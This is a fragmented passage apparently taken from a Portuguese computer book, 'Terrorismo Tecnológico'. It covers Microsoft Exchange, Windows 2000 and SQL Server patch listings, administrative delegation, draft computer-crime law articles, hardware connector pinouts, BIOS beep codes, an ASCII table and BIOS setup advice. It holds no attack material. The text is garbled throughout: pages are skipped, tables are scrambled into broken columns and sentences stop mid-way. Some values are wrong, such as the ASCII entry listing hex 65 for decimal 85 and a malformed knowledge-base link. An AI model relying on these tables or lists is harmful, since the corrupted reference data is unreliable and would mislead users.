us;Q313450) , "Windows 2000 Security Patch: SMTP Rollup"
(site em inglês), lançado em 27 de fevereiro de 2002
3.1 Q316056
(http://support.microsoft.com/view/tn.asp?kb=316056) XGEN:
Exchange 2000 Server Post-SP2 Admin Fixes Available
3.2 Q315911
(http://support.microsoft.com/view/tn.asp?kb=3159110 XGEN:
Exchange 2000 Server Post-SP2 MTA Fixes Available
3.3 Q316463
(http://support.microsoft.com/view/tn.asp?kb=316463) XGEN:
Exchange 2000 Server Post-Service Pack 2 Directory Fixes A
Terrorismo Tecnológico 368
Aprenda Para Sobreviver
3.4 Q316465
(http://support.microsoft.com/view/tn.asp?kb=316465) XGEN:
Exchange 2000 Server Post-Service Pack 2 CDO Fixes
3.5 Q316664
(http://support.microsoft.com/view/tn.asp?kb=316664) XGEN:
Exchange 2000 Server Post-Service Pack 2 Protocols Fixes
3.6 Q317323
(http://support.microsoft.com/view/tn.asp?kb=317323) XGEN:
Exchange 2000 Server Post-Service Pack 2 Transport Fixes
Q302473
(http://support.microsoft.com/view/tn.asp?kb=302473) XGEN:
Terrorismo Tecnológico 369
Aprenda Para Sobreviver
Q311401
(http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q311401) "Windows 2000 Security Rollup Package 1
(SRP1)" (site em inglês), lançado em 30 de janeiro de 2002
Q314147
(http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q314147) , "MS02-006: An Unchecked Buffer in the SNMP
Service May Allow Code to Run (Q314147)" (site em inglês)
lançado em 15 de fevereiro de 2002
(http://support.microsoft.com/view/tn.asp?kb=297105) (site em
inglês)
Para obter uma lista dos artigos sobre hotfixes pós-SP2 do Microsoft
SQL Server 2000, vá para:
(http://support.microsoft.com/default.aspx?scid=kb;EN-US;q290211)
(site em inglês)
Terrorismo Tecnológico 381
Aprenda Para Sobreviver
Para obter mais informações sobre SQL Server 7.0 Service Packs,
consulte: Q301511
(http://support.microsoft.com/view/tn.asp?kb=301511) INF: How to
Obtain the Latest SQL Server 7.0 Service Pack (site em inglês)
Abril de 2002
Fevereiro de 2002
Dezembro de 2001
Julho de 2001
Junho de 2001
Dezembro de 2000
Abril de 2002
Fevereiro de 2002
Dezembro de 2001
Junho de 2001
OU
OU
Users
Downlevel
Domain Domain
Domain Domain
Kerberos Trust
Domain
Domain
Delegação de Administração
Delegação de administração é uma ferramenta de valor para as
organizações confinarem a administração de segurança para
aplicação somente em subconjuntos definidos do domínio inteiro da
organização. O requisito importante é conceder direitos para
administrar um pequeno conjunto de usuários ou grupos nas suas
áreas de responsabilidade e, ao mesmo tempo, não dar permissões
para contas de gerenciamento em outras partes da organização.
Delegação de responsabilidade para criar usuários ou grupos é
Terrorismo Tecnológico 396
Aprenda Para Sobreviver
SSPI
NTLM Kerberos SChannel DPA
SSL/TLS
Summary.
Informação adicional sobre segurança Microsoft Internet está
disponível no Web site http://www.microsoft.com/security.
Informação adicional sobre a arquitetura de segurança Windows NT,
Security Support Provider Interface, CryptoAPI e APIs de segurança
do Windows NT está disponível nas referências online para a
Plataforma SDK Microsoft.
CAPÍTULO XXI
Art. 3º. Para fins desta lei, entende-se por informações privadas aquelas
relativas a pessoa física ou jurídica identificada ou identificável.
Art. 4º. Ninguém será obrigado a fornecer informações sobre sua pessoa ou
de terceiros, salvo nos casos previstos em lei.
pessoa a que se referem, que poderá ser tornada sem efeito a qualquer
momento, ressalvando-se o pagamento de indenizações a terceiros, quando
couberem.
Art. 15o. Se qualquer dos crimes previstos nesta lei é práticado no exercício
de atividade profissional ou funcional, a pena é aumentada de um sexto até
a metade.
Terrorismo Tecnológico 411
Aprenda Para Sobreviver
Art. 16o. Nos crimes definidos nesta lei somente se procede mediante
representação do ofendido, salvo se cometidos contra o interesse da União,
Estado, Distrito Federal Município, órgão ou entidade da administração
direta ou indireta, empresa concessionária de serviços públicos, fundações
instituídas ou mantidas pelo poder público, serviços sociais autônomos,
instituições financeiras ou empresas que explorem ramo de atividade
controlada pelo poder público, casos em que a ação é pública
incondicionada.
Art. 17o. Esta lei regula os crimes relativos à informática sem prejuízo das
demais cominações previstas em outros diplomas legais.
Art. 18o. Esta lei entra em vigor 30 (trinta) dias a contar da data de sua
publicação.
Extras Uteis.
CONECTORES
CONECTORES(guia de conectores)
COM1/COM2 RS-232 PORTA SERIAL ( DB-9 - DB25 )
CONECTOR DO BARRAMENTO ISA
CONECTOR DO BARRAMENTO PCI
ETHERNET 10/100 BASE-T ( RJ-45 )
FLOPPY DRIVE
FONTE AT
FONTE ATX
GAME CONECTOR
IDE HARD DRIVE
KEYBOARD CONECTOR
KEYBOARD E MOUSE CONECTOR ( MINI-DIN - PS2 )
PORTA PARALELA ( DB-25 )
SCSI
USB
VGA ( DB-15 )
21 GND 22 WRITE
DATA
23 GND 24 WRITE
GATE
25 GND 26 TRACK 0
27 GND 28 WRITE
PROTECT
29 GND 30 READ DATA
31 GND 32 HEAD
SELECT
33 GND 34 DISK
CHANGE
FONTE AT
7 GND
8 GND
9 -5V
10 +5V
11 +5V
12 +5V
Terrorismo Tecnológico 416
Aprenda Para Sobreviver
FONTE ATX
+3.3V +3.3V
-12V +3.3V
GND GND
PS/ON +5V
GND GND
GND +5V
GND GND
-5V POWER
OK
+5V 5 VSB
+5V 12V
14 AUTOFDXT - Avanço
automático
15 Erro
16 INIT - Inicialização da
impressora
17 SLCTIN - Seleção de
entrada
18 a 0V -Terra
25
SCSI CONECTOR
12 SD+6 46 SD-6
13 SD+7 47 SD-7
14 SDP+0 48 SD-0
15 GND 49 GND
16 DIFS 50 SENIN
17 TPWEX 51 TPWEX
18 TPWEX 52 TPWEX
19 N/C 53 NC
20 GND 54 GND
21 SATN+ 55 SATN-
22 GND 56 GND
23 SBSY+ 57 SBSY-
24 SACK+ 58 SACK-
25 SRST+ 59 SRST-
26 SMSG+ 60 SMSG-
27 SSEL+ 61 SSEL-
28 SCD+ 62 SCD-
29 SREQ+ 63 SREQ-
30 SIO+ 64 SIO-
31 SD+8 65 SD-8
32 SD+9 66 SD-9
33 SD+10 67 SD-10
34 SD+11 68 SD-11
Terrorismo Tecnológico 419
Aprenda Para Sobreviver
USB CONECTOR
PINO SINAL
1 TRANSMITE
DADOS +
2 TRANSMITE
DADOS -
3 RECEBE
DADOS +
4 N/C
5 N/C
6 RECEBE
DADOS -
7 N/C
8 N/C
dados
pronto
5 GND -Terra 7
do sinal
6 DSR - Data 6
Set pronto
7 RTS - 4
Solicitação
de dados
8 CTS - 5
Pronto para
enviar
9 RI - 22
Indicador de
chamadas
KEYBOARD CONECTOR
GAME CONECTOR
3 (B_Y)
14 BOTÃO 7
(B_PB2)
15 +5 VDC
M16CS D1 C1 SBHE
IO16CS D2 C2 A23
IRQ10 D3 C3 A22
IRQ11 D4 C4 A21
IRQ12 D5 C5 A20
IRQ15 D6 C6 A19
IRQ14 D7 C7 A18
DACK0 D8 C8 A17
DRQ0 D9 C9 MR
DACK5 D10 C10 MW
DRQ5 D11 C11 D8
DACK6 D12 C12 D9
DRQ6 D13 C13 D10
DACK7 D14 C14 D11
Terrorismo Tecnológico 425
Aprenda Para Sobreviver
Beeps
Terrorismo Tecnológico 430
Aprenda Para Sobreviver
processador achou o
problema )
8 Falha no teste da 1 3 4 1 Memória ou placa
memória de vídeo ( 1 3 4 3 mãe ( verifique a
placa de vídeo ou 1 4 1 1 memória primeiro )
placa mãe )
9 Programa da bios 2132 Alguma placa PCI
com problema ( pode com problema
ser causado também
pela placa mãe )
10 Problema com leitura 2133 Placa de vídeo ( ou
de dados CMOS da placa mãe )
Bios deve-se resetar
a CMOS se persiste
o erro deve-se
substituir a placa
mãe.
11 Memória cachê da 2241 Memória da placa
placa mãe ( se houver mãe ( cachê )
) esta com defeito
1 longo Bios de terceiros (
BIOS AWARD 1 curto placas extras como
controladoras SCSI
por exemplo )
1 longo Um dos Observação: Quando não
primeiros houver som deve-se verificar
módulos de primeiramente os pentes de
memória com memória se estão bem
defeito encaixados, se não resolver
1 longo Controladora reset a CMOS, verifique o
2 curtos de vídeo com encaixe do processador ( se a
defeito ( pode bateria que alimenta a CMOS
ser causado estiver com carga muito baixa
pela placa também pode impedir a
mãe ) inicialização do sistema. Se
os demais Memória RAM após tudo isto continuar sem
Terrorismo Tecnológico 432
Aprenda Para Sobreviver
mais...beeps
Non-Fatal Errors
TONE CONDITION
1 Conventional/extended
long, memory
3
short
1 Display/retrace test
long,
8
short
1-2-1 Programmable
interval timer
1-2-2 DMA Initialization
1-2-3 DMA page register
write/read
1-3-1 RAM refresh
verification
1-3-3 First 64K RAM chip
or data line
1-3-4 First 64K RAM
odd/even logic
1-4-1 Address line first
64K RAM
1-4-2 Parity failure first
64K RAM
2-1-1 Bit 0, first 64K RAM
2-1-2 Bit 1, first 64K RAM
2-1-3 Bit 2, first 64K RAM
2-1-4 Bit 3, first 64K RAM
2-2-1 Bit 4, first 64K RAM
2-2-2 Bit 5, first 64K RAM
2-2-3 Bit 6, first 64K RAM
2-2-4 Bit 7, first 64K RAM
2-3-1 Bit 8, first 64K RAM
2-3-2 Bit 9, first 64K RAM
2-3-3 Bit 10, first 64K RAM
2-3-4 Bit 11, first 64K RAM
2-4-1 Bit 12, first 64K RAM
2-4-2 Bit 13, first 64K RAM
2-4-3 Bit 14, first 64K RAM
2-4-4 Bit 15, first 64K RAM
3-1-1 Slave DMA register
3-1-2 Master DMA register
3-1-3 Master interrupt
mask register
Terrorismo Tecnológico 435
Aprenda Para Sobreviver
Energia
Terrorismo Tecnológico 438
Aprenda Para Sobreviver
usado)
Teclado 1,25 Watts
Zip IDE interno Maximo 8,5 Watts
SISTEMA OPERACIONAL
BIOS:
Tabela ASCII
Terrorismo Tecnológico 442
Aprenda Para Sobreviver
TABELA ASCII
DEC HEX ASC DEC HEX ASC DEC HEX ASC DEC HEX ASC
0 0 NUL 64 40 @ 128 80 Ç 192 C0 +
1 1 SOH 65 41 A 129 81 ü 193 C1 -
2 2 STX 66 42 B 130 82 é 194 C2 -
3 3 ETX 67 43 C 131 83 â 195 C3 +
4 4 EOT 68 44 D 132 84 ä 196 C4 -
5 5 ENQ 69 45 E 133 85 à 197 C5 +
6 6 ACK 70 46 F 134 86 å 198 C6 ã
7 7 BEL 71 47 G 135 87 ç 199 C7 Ã
8 8 BS 72 48 H 136 88 ê 200 C8 +
9 9 HT 73 49 I 137 89 ë 201 C9 +
10 A LF 74 4A J 138 8A è 202 CA -
11 B VT 75 4B K 139 8B ï 203 CB -
12 C FF 76 4C L 140 8C î 204 CC ¦
13 D CR 77 4D M 141 8D ì 205 CD -
14 E SO 78 4E N 142 8E Ä 206 CE +
15 F SI 79 4F O 143 8F Å 207 CF ¤
16 10 DLE 80 50 P 144 90 É 208 D0 ð
17 11 DC1 81 51 Q 145 91 æ 209 D1 Ð
18 12 DC2 82 52 R 146 92 Æ 210 D2 Ê
19 13 DC3 83 53 S 147 93 ô 211 D3 Ë
20 14 DC4 84 54 T 148 94 ö 212 D4 È
21 15 NAK 85 65 U 149 95 ò 213 D5 i
22 16 SYN 86 56 V 150 96 û 214 D6 Í
23 17 ETB 87 57 W 151 97 ù 215 D7 Î
Terrorismo Tecnológico 443
Aprenda Para Sobreviver
Setup
Terrorismo Tecnológico 446
Aprenda Para Sobreviver
Setup
Para entrar no setup você deve pressionar a tecla Del durante
a contagem de memória. Em alguns micros "de marca" (como os da
IBM), a tecla é outra e você deve prestar atenção às instruções que
aparecem na tela do micro durante a contagem de memória para
poder ter acesso ao setup.
• Auto Detect Hard Disk (ou HDD Auto Detect ou IDE Setup):
Lê os parâmetros dos discos rígidos IDE do micro e configura
automaticamente o setup avançado com os valores lidos.
• Hard Disk Utility (ou HDD Low Level Format): Formata o disco
rígido em baixo nível (formatação física). Essa opção não
deve nunca ser usada, sob a pena de você danificar
permanentemente o seu disco rígido.
É importante notar que o setup do seu micro pode não ter todas as
opções aqui descritas, da mesma forma que podem existir opções
que não apresentamos aqui. Lembre-se que para habilitar uma
opção, você deverá configurá-la como "enabled" e, para desabilitar,
como "disabled".
Se você não tem paciência para fazer esse ajuste fino ou não tem o
tempo necessário para fazê-lo, não se preocupe: baste habilitar a
opção Auto Configuration e esqueça essa história de ajuste de wait
states.
Em geral, opções que tenham a ver com base de tempo devem ser
configuradas da mesma maneira do que wait states. Isto é, quanto
menor o tempo, maior o desempenho. Mas, para isso, você deve
achar o valor exato da configuração, conforme explicamos na
semana passada. As seguintes opções podem ser configuradas da
mesma forma que wait states:
Dispositivos ISA antigos não são Plug and Play e, com isso, não há
como alterar suas configurações por software, isto é, através do
sistema operacional (nesse tipo de periférico a configuração é
normalmente feita através de jumpers). Se um dispositivo Plug and
Play "cismar" em usar uma mesma interrupção ou canal de DMA
que um periférico antigo não Plug and Play, pode ser que o sistema
não consiga gerenciar esse conflito, fazendo com que os periféricos
entrem em conflito e não funcionem.
Caso você não tenha placas antigas instaladas em seu micro, você
pode simplesmente configurar a opção "Resources Controlled By"
em "Auto", para informar que todos os periféricos de seu micro são
Plug and Play. No caso de existir ao menos uma placa antiga, não
Plug and Play, instalada em seu micro, você deverá deixar essa
opção em "Manual" e efetuar a configuração que descrevemos.
http://www.leandro-t.cjb.net/
leandro_t@terra.com.br